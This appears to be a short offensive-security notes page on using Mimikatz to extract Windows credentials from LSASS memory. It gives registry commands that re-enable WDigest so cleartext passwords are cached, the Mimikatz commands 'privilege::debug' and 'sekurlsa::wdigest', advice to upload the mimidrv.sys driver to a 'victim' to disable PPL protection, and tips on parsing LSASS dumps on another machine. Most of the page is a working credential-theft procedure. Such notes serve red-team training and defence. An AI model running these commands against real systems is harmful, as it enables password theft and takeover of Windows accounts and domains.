Mimikatz Abusing Kerberos
To extract credentials from memory due to caching requirements of the Kerberos protocol
Last updated
To extract credentials from memory due to caching requirements of the Kerberos protocol
Last updated
We need SYSTEM (or local administrator) permissions to gain access to the hashes stored on a target Local Security Authority Subsystem Service (LSASS)
The wdigest authentication protocol requires a clear text password, but it is disabled in Windows 8.1 and newer. We can enable it by:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
or
New-ItemProperty -Path "HKLM:SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" -Name UseLogonCredential -Value 1
The clear text password will be cached in LSASS after subsequent logins.
privilege::debug
sekurlsa::wdigest
We must be local administrator or SYSTEM to dump the credentials, which means we will also have the SeLoadDriverPrivilege privilege and the ability to load any signed drivers.
We can load mimidrv.sys driver to disable PPL. (upload to victim and place in the same dir of mimikatz) *noisy*
When opening a dump file in Mimikatz, the target machine and the processing machine must have a matching OS and architecture.
For example, if the dumped LSASS process was from a Windows 10 64-bit machine; we must also parse it on a Windows 10 or Windows 2016/2019 64-bit machine.
However, processing the dump file requires neither an elevated command prompt nor privilege::debug.
